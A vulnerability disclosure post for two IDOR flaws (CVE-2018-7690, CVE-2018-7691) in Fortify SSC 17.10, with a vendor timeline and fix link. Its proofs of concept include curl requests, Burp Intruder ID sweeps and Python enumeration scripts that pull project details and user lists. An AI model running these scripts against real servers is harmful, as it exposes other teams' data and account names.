Hello everyone, we continue disclosing CVEs/exploits (0-days) in specific software/hardware products. A few months ago, during my latest research, I found interesting security issues in Fortify Software; this time the attack vector is IDOR (Insecure Direct Object Reference).

What is Fortify? It is a security product that performs source code audit/analysis based on "rulepacks" and can be integrated with other security tools such as WebInspect (same vendor), Jenkins, etc. Product details here: https://marketplace.microfocus.com/fortify

CVE-2018-7690

Vulnerability

Fortify SSC (Software Security Center) 17.10 does not properly check ownership of projects, which allows remote authenticated (view-only) users to read arbitrary project details via the project ID parameter of the API endpoint /api/v1/projects/{NUMBER}.

Fortify Version Details here:

Fortify Software Security Center (SSC) Version 17.10

Note: the View-only role is a restricted role: it can view results but cannot interfere with issue triage or the remediation process.

Fortify Software Security Center (SSC) Role Matrix

Proof of concept exploit:

Pre-requisites:

- curl deployed (Windows or Linux)

- jq deployed, for parsing JSON fields (Windows or Linux)

- Burp Suite Free/Pro, or any other HTTP proxy, to catch/send the request (optional)

Step (1): Log on to the fortifyserver.com SSC (Software Security Center) 17.10 instance with your view-only (restricted) role.

The login URL normally looks as follows:

Step (2): Once logged in, extract the Cookie header; its format is normally as follows:

"Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;"

Step (3): Start Burp Suite Free/Pro or any other HTTP proxy (optional), listening on port 8080 by default.

Step (4): The offending GET request:

GET /ssc/api/v1/projects/2 HTTP/1.1
Host: fortifyserver.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;

Step (5): Send the first GET request (including the session cookie) and parse the JSON received, using curl and jq as follows. The browser's Accept-Encoding header is left out on purpose: if curl asks for gzip it receives a compressed body and jq cannot parse it.

# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/2 \
  -H "Host: fortifyserver.com" \
  -H "Connection: close" \
  -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" \
  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" \
  -H "Accept-Language: en-US,en;q=0.9" \
  -b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF" \
  --proxy http://127.0.0.1:8080 | jq '.data'

You should see the project details in the response:

Using curl command to get project details (1)

Step (6): Now extract the details of all projects registered in the Fortify SSC server.

Payload: https://fortifyserver.com/ssc/api/v1/projects/{NUMBER}; change the number as follows:

# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/5 \
  -H "Host: fortifyserver.com" \
  -H "Connection: close" \
  -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" \
  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" \
  -H "Accept-Language: en-US,en;q=0.9" \
  -b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF" \
  --proxy http://127.0.0.1:8080 | jq '.data'

You should see the details of other projects, as follows:

Using curl command to get project details (2)

Step (7): Automate with Burp Suite Pro/Free:

Payload Positions ("Intruder" tab -> "Positions"): highlight the project ID as follows: /ssc/api/v1/projects/§1§

Payloads ("Intruder" tab -> "Payloads") with the following settings:

-> Payload set: 1
-> Payload type: Numbers

Payload Options [Numbers]:

-> Type: Sequential
-> From: 0
-> To: 1500
-> Step: 1

Then start the attack... Have fun!

Final IDOR extraction (project details)

Project details extraction using Burp Suite Professional
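The Intruder run above can be reproduced without Burp. The script below is an added example for this write-up, not the author's or the vendor's code: it walks the project ID space with the view-only session and sorts each ID into accessible, forbidden, or missing, so the same run doubles as a check that the vendor fix works (after the fix, a view-only user should only see projects assigned to them and get 403 for the rest). Assumptions: the endpoint shape shown above (GET /ssc/api/v1/projects/{id} answering with a top-level "data" object carrying "id" and "name"), the fortifyserver.com host from the page, a JSESSIONID placeholder, and Burp on 127.0.0.1:8080 if a proxy is wanted. The sample responses embedded at the bottom are constructed so the script runs offline.

```python
#!/usr/bin/env python3
"""Walk the SSC project ID space as a low-privilege user (CVE-2018-7690 pattern).

Added example for this write-up, not the author's or the vendor's code.
Assumes: GET /ssc/api/v1/projects/{id} replies with {"data": {"id": .., "name": ..}},
a valid JSESSIONID of a view-only user, optional proxy at 127.0.0.1:8080.
"""
import json
import ssl
import urllib.error
import urllib.request
from typing import Callable, Iterable, Optional, Tuple

# A fetch function maps a URL to (HTTP status, response body).
Fetch = Callable[[str], Tuple[int, str]]


def http_fetch(session_cookie: str, proxy: Optional[str] = None) -> Fetch:
    """Build a live fetcher that sends the session cookie, skips certificate
    verification like curl -k, and optionally routes through a proxy."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    handlers = [urllib.request.HTTPSHandler(context=ctx)]
    if proxy:
        handlers.append(urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
    opener = urllib.request.build_opener(*handlers)

    def fetch(url: str) -> Tuple[int, str]:
        req = urllib.request.Request(
            url, headers={"Accept": "application/json",
                          "Cookie": f"JSESSIONID={session_cookie}"})
        try:
            with opener.open(req, timeout=15) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:   # 403/404 arrive as exceptions
            return err.code, err.read().decode("utf-8", "replace")
    return fetch


def enumerate_projects(base_url: str, ids: Iterable[int], fetch: Fetch) -> dict:
    """Equivalent of the Burp Intruder 'Numbers' run, with the outcome sorted.

    'accessible' is the IDOR evidence: every project the session could read.
    Re-run with the same view-only session after the vendor fix: only projects
    assigned to that user should remain there, the rest should be 'forbidden'."""
    result = {"accessible": {}, "forbidden": [], "missing": [], "other": {}}
    for pid in ids:
        status, body = fetch(f"{base_url}/ssc/api/v1/projects/{pid}")
        if status == 200:
            try:
                data = json.loads(body).get("data")
            except (ValueError, AttributeError):   # 200 without a JSON object
                data = None
            if not isinstance(data, dict):
                result["other"][pid] = status
                continue
            result["accessible"][pid] = {"id": data.get("id"), "name": data.get("name")}
        elif status == 403:
            result["forbidden"].append(pid)
        elif status == 404:
            result["missing"].append(pid)
        else:
            result["other"][pid] = status
    return result


# Constructed replies (made-up IDs and names) so the script runs offline.
SAMPLE_RESPONSES = {
    2: (200, json.dumps({"data": {"id": 2, "name": "WebGoat"}})),
    5: (200, json.dumps({"data": {"id": 5, "name": "PayrollAPI"}})),
    7: (403, json.dumps({"message": "Access denied"})),
}


def sample_fetch(url: str) -> Tuple[int, str]:
    """Offline stand-in for http_fetch(): answers from SAMPLE_RESPONSES."""
    pid = int(url.rsplit("/", 1)[1])
    return SAMPLE_RESPONSES.get(pid, (404, json.dumps({"message": "Not found"})))


if __name__ == "__main__":
    # Swap sample_fetch for http_fetch("<JSESSIONID>", proxy="http://127.0.0.1:8080")
    # to run against a real server (ID range 0-1500 as in the Intruder setup).
    print(json.dumps(enumerate_projects("https://fortifyserver.com", range(0, 11),
                                        sample_fetch), indent=2))
```

Keeping the transport behind a fetch callable is what makes the run repeatable: the same enumerate_projects call is used against the sample data, against the vulnerable 17.10 server, and again after the hotfix, and the only thing that should change is which IDs land in "accessible".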

Timeline:

2018-05-24: Discovered

2018-05-25: Retest on PRO environment

2018-05-31: Vendor notification, two issues found

2018-05-31: Vendor feedback received

2018-06-01: Internal communication

2018-06-01: Vendor feedback, two issues confirmed

2018-06-05: Vendor notification, new issue found

2018-06-06: Vendor feedback, evaluating the High submission

2018-06-08: Vendor feedback, High issue confirmed

2018-06-19: Researcher, reminder sent

2018-06-22: Vendor feedback, summary of CVEs handled the official way

2018-06-26: Vendor feedback, official hotfix for the High issue available to test

2018-06-29: Researcher feedback

2018-07-02: Researcher feedback

2018-07-04: Researcher feedback, hotfix tested on QA environment

2018-07-05: Vendor feedback, fixes scheduled for Aug/Sep 2018

2018-08-02: Reminder to vendor, feedback received OK!

2018-09-26: Reminder to vendor, feedback received OK!

2018-09-26: Fixes received from the vendor

2018-10-02: Internal QA environment failed, rebuilding the researcher's ecosystem

2018-10-11: Internal QA environment failed, rebuilding the researcher's ecosystem

2018-10-11: Feedback from the vendor, technical details provided to the researcher

2018-10-16: Fixes now tested on QA environment

2018-11-08: Reminder received from the vendor, feedback provided by the researcher

2018-11-09: Re-test of fixes on QA environment

2018-11-15: Re-test of fixes on QA environment, now with SSC 18.20 deployed

2018-11-21: Researcher feedback

2018-11-23: Fixes working well, confirmed by the researcher

2018-11-23: Vendor feedback, final details to disclose the CVE; official fixes available for customers

2018-11-26: Vendor feedback, CVE and official fixes to be disclosed

2018-11-26: Agreement with the vendor to publish the CVE/advisory

2018-11-27: Public report

Discovered by:

Alex Hernandez aka alt3kx:

================

Please visit https://github.com/alt3kx for more information.

My current exploit list @exploit-db:

https://www.exploit-db.com/author/?a=1074

https://www.exploit-db.com/author/?a=9576

Mitigations

=======

Provided by the vendor here:

Document ID: KM03298201

https://softwaresupport.softwaregrp.com/doc/KM03298201

CVE-2018-7691

Vulnerability



Fortify SSC (Software Security Center) 17.10 does not properly check ownership of "authEntities" (the users assigned to an application version), which allows remote authenticated (view-only) users to read arbitrary details through the bulk API (/api/v1/bulk) by wrapping a request to /api/v1/projectVersions/{NUMBER}/authEntities. Note that the real target URI travels inside the JSON body, so web-server access logs only record POST /ssc/api/v1/bulk for this traffic.

Proof of Concept exploit:

Pre-requisites: the same as for CVE-2018-7690 above.

Step (1): the same as for CVE-2018-7690 above.

Step (2): Once logged in, extract the Cookie header; its format is normally as follows:

"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"

Step (3): Start Burp Suite Free/Pro or any other HTTP proxy (optional), listening on port 8080 by default.

Step (4): The offending POST request:

POST /ssc/api/v1/bulk HTTP/1.1
Host: fortifyserver.com
Connection: close
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;
Content-Length: 123

{"requests":[{"uri":"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities","httpVerb":"GET"}]}

Step (5): Send the first POST request (including the session cookie) and parse the JSON received, using curl and jq as follows. As before, the Accept-Encoding header is left out so that jq gets an uncompressed body:

# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk \
  -H "Host: fortifyserver.com" \
  -H "Connection: close" \
  -H "Accept: application/json, text/plain, */*" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" \
  -H "Content-Type: application/json;charset=UTF-8" \
  -H "Accept-Language: en-US,en;q=0.9" \
  -b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414" \
  --data-binary '{"requests":[{"uri":"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities","httpVerb":"GET"}]}' \
  --proxy http://127.0.0.1:8080 | jq '.data[].responses[].body.responseCode'

You should see the following responseCode in the reply: 200 OK!

Using curl command to get 200 OK! response

Step (6): Now extract all local and LDAP/Active Directory users registered in the Fortify SSC server.

Payload: /api/v1/projectVersions/{NUMBER}/authEntities; see the --data-binary argument below and change the number as follows:

# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk \
  -H "Host: fortifyserver.com" \
  -H "Connection: close" \
  -H "Accept: application/json, text/plain, */*" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" \
  -H "Content-Type: application/json;charset=UTF-8" \
  -H "Accept-Language: en-US,en;q=0.9" \
  -b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414" \
  --data-binary '{"requests":[{"uri":"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities","httpVerb":"GET"}]}' \
  --proxy http://127.0.0.1:8080 | jq '.data[].responses[].body.data[].entityName'

You should see the following response, listing the users available:

“admin”

“sca”

“alex”

[../snip]

Using curl command to get Local/LDAP users

Step (7): Automate with Burp Suite Pro/Free:

Payload Positions ("Intruder" tab -> "Positions"): highlight the project version ID inside the JSON body as follows: /api/v1/projectVersions/§1§/authEntities

Payloads ("Intruder" tab -> "Payloads") with the following settings:

-> Payload set: 1
-> Payload type: Numbers

Payload Options [Numbers]:

-> Type: Sequential
-> From: 0
-> To: 1500
-> Step: 1

Then start the attack... Have fun!

Final IDOR extraction (ldap/Active Directory/local users)

ldap/AD/local users extraction using Burp Suite Professional
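Because the bulk endpoint takes an array of sub-requests, the enumeration in steps 6 and 7 can be batched instead of sending one POST per version ID. The script below is an added example for this write-up, not the author's or the vendor's code. It assumes the envelope shown above (POST /ssc/api/v1/bulk with {"requests":[{"uri":...,"httpVerb":"GET"}]}, answered with entries read as .data[].responses[].body, where body carries responseCode and data[].entityName); that several sub-requests can travel in one POST and are answered in request order is an assumption drawn from the array form, and a real server may cap the batch size. The host and version IDs are placeholders and the reply embedded at the bottom is constructed so the script runs offline.

```python
#!/usr/bin/env python3
"""Pull authEntities for many project versions through the SSC bulk endpoint
(CVE-2018-7691 pattern).

Added example for this write-up, not the author's or the vendor's code.
Assumes the bulk envelope shown in the write-up and that sub-requests are
answered in request order; batch size limits on a real server are unknown.
"""
import json
import ssl
import urllib.error
import urllib.request
from typing import Dict, Iterable, List, Optional, Tuple


def build_bulk_body(base_url: str, version_ids: Iterable[int]) -> str:
    """One bulk request carrying a GET sub-request per project version ID.
    The real target URI sits inside the JSON body, which is why the web
    server log only shows POST /ssc/api/v1/bulk for this traffic."""
    requests = [
        {"uri": f"{base_url}/ssc/api/v1/projectVersions/{vid}/authEntities",
         "httpVerb": "GET"}
        for vid in version_ids
    ]
    return json.dumps({"requests": requests})


def post_bulk(base_url: str, session_cookie: str, body: str,
              proxy: Optional[str] = None) -> Tuple[int, str]:
    """Send the bulk body with the session cookie (curl -k semantics, optional proxy)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    handlers = [urllib.request.HTTPSHandler(context=ctx)]
    if proxy:
        handlers.append(urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
    opener = urllib.request.build_opener(*handlers)
    req = urllib.request.Request(
        f"{base_url}/ssc/api/v1/bulk", data=body.encode("utf-8"), method="POST",
        headers={"Content-Type": "application/json;charset=UTF-8",
                 "Accept": "application/json, text/plain, */*",
                 "X-Requested-With": "XMLHttpRequest",
                 "Cookie": f"JSESSIONID={session_cookie}"})
    try:
        with opener.open(req, timeout=15) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def parse_bulk_response(body: str) -> List[Tuple[int, List[str]]]:
    """Flatten .data[].responses[].body into (responseCode, [entityName, ...])
    per sub-response, in the order the server returned them."""
    out = []
    for entry in json.loads(body).get("data", []):
        for resp in entry.get("responses", []):
            sub = resp.get("body") or {}
            names = [e["entityName"] for e in (sub.get("data") or []) if "entityName" in e]
            out.append((int(sub.get("responseCode", 0)), names))
    return out


def users_per_version(version_ids: Iterable[int], body: str) -> Dict[int, List[str]]:
    """Pair sub-responses with the requested IDs and keep only the 200s.
    Any version listed here that the session is not assigned to is the IDOR;
    after the fix a view-only user should get 403 for those and the dict shrinks."""
    found = {}
    for vid, (code, names) in zip(list(version_ids), parse_bulk_response(body)):
        if code == 200:
            found[vid] = names
    return found


# Constructed reply for an offline run: the names mirror the ones quoted above,
# and the second sub-request is shown as denied, which is what a fixed server answers.
SAMPLE_BULK_RESPONSE = json.dumps({"data": [
    {"responses": [{"body": {"responseCode": 200, "data": [
        {"entityName": "admin"}, {"entityName": "sca"}, {"entityName": "alex"}]}}]},
    {"responses": [{"body": {"responseCode": 403, "data": []}}]},
]})


if __name__ == "__main__":
    ids = [3, 4]
    body = build_bulk_body("https://fortifyserver.com", ids)
    # Live run: status, reply = post_bulk("https://fortifyserver.com", "<JSESSIONID>",
    #                                     body, proxy="http://127.0.0.1:8080")
    reply = SAMPLE_BULK_RESPONSE
    print(json.dumps(users_per_version(ids, reply), indent=2))
```

On the defensive side the same parser is the check you want after patching: feed it a bulk reply obtained with a view-only session and assert that every version the user is not assigned to comes back with a non-200 responseCode and an empty name list.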

Timeline:

Both issues were reported to the vendor together on 2018-05-31, so the timeline is the same as for CVE-2018-7690 above, with one difference:

2018-12-12: Public report

Discovered by:

Alex Hernandez aka alt3kx (see above).

Mitigations

=======

Provided by the vendor in the same document as for CVE-2018-7690:

Document ID: KM03298201

https://softwaresupport.softwaregrp.com/doc/KM03298201